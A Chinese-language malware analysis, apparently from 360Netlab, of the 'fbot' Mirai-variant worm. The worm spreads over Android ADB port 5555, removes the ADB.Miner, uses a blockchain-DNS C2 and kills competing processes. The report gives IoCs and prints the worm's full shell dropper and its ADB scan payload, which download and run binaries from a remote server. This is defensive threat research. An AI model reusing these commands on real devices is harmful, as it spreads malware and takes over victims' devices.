ADB.Miner 已经在我们之前的多篇 文章 中提及，这是一个利用adb安卓系统调试接口传播的蠕虫，其功能单一，除了蠕虫传播模块就是挖矿。今天下午，我们注意到一个新的蠕虫正在清理 adb.miner。在完成了清理动作后，该蠕虫会等待来自C2（musl.lib，66.42.57.45:7000， Singapore/SG）的下一步指令。值得一提的是，该C2域名的解析，需要通过emercoin.com利用区块链DNS系统完成。我们将该蠕虫命名为fbot，主要是因为该蠕虫的主要执行模块使用了这个名字。 

IoC

下载服务器

188.209.52.142 Netherlands/NL AS49349

C2服务器

musl.lib 由区块链DNS系统emercoin.com解析，当前的解析IP地址是在下面
66.42.57.45:7000 Singapore/SG Singapore

下载URL

hxxp://188.209.52.142/c #脚本，会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件，并做清理
hxxp://188.209.52.142/w #脚本，会下载执行fbot.{arch}样本、卸载 com.ufo.miner 组件，并做清理
hxxp://188.209.52.142/fbot.aarch64 #扫描器，下同，完成自身的蠕虫传播
hxxp://188.209.52.142/fbot.arm7
hxxp://188.209.52.142/fbot.mips
hxxp://188.209.52.142/fbot.mipsel
hxxp://188.209.52.142/fbot.x86
hxxp://188.209.52.142/fbot.x86_64

分析

恶意样本通过 adb 安卓系统调试接口投入，这与之前的 adb.miner 的投入方式一致。

投入载荷会下载执行 hxxp://188.209.52.142/c，或者是hxxp://188.209.52.142/w。这两个脚本的区别仅在下载方式是wget/curl，下文不再区分。主体功能一致，包括：

尝试进一步从 188.209.52.142 下载 fbot.{arch} 恶意样本；
卸载 com.ufo.miner，即ADB.Miner；
完成自身清理工作。

该脚本的详细内容如下：

!/system/bin/sh

n="arm7 mipsel mips x86 x86_64 aarch64"
http_server="188.209.52.142"

for i in $n
do
cp /system/bin/sh fbot.$i
>fbot.$i
curl hxxp://$http_server/fbot.$i > fbot.$i # wget hxxp://$http_server/fbot.$i > fbot.$i
chmod 777 fbot.$i
./fbot.$i
rm fbot.$i
done

Cleanup

for i in $n
do
rm fbot.$i
done

pm uninstall com.ufo.miner

Suicide

rm $0

下载得到的 fbot.{arch} 是个mirai的变种，改动的部分包括：

C2：66.42.57.45:7000，Singapore/SG Singapore
扫描：改为针对 TCP 5555 adb 端口扫描。扫描成功后，会下载hxxp://188.209.52.142/c，完成对蠕虫自身的传播。
杀进程：样本中会遍历 /proc/pid/exe 目录下面的特定进程，如smi/xig/rig等。枚举得到符合条件的进程后，会杀掉该进程。

该变种保留了 mirai 僵尸网络的DDoS功能，但我们尚未检测到该C2有发出DDoS攻击指令。

扫描阶段的payload如下：

shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c

枚举进程列表

/data/local/tmp/smi
/data/local/tmp/xig
/data/local/tmp/trinity
/data/local/tmp/z
/data/local/tmp/log
/data/local/tmp/rig
/data/local/tmp/.f
/data/local/tmp/tyg

musl.lib 的域名解析

该C2域名不是一个标准的DNS域名，其顶级域 .lib 并没有在 ICANN 注册，因而也不能为通用的DNS系统解析。

该域名需要在emercoin.com上解析。当前的解析记录，见下面的连接。emercoin.com 是一个基于区块链的DNS系统。https://explorer.emercoin.com/nvs//musl.lib//25/1/1

emercoin.com 当前利用了 OpenNic 提供的公共DNS解析服务器来桥接传统DNS和区块链DNS。被感染的机器，会利用硬编码的 OpenNic 下属公共DNS解析服务器完成域名解析。这些DNS解析服务器至少包括：

163.53.248.170
174.138.48.29
5.132.191.104

联系我们

感兴趣的读者，可以在 twitter 或者在微信公众号 360Netlab 上联系我们。或者发送邮件给 netlab at 360 dot cn 。

文章原文链接:https://www.anquanke.com/post/id/159881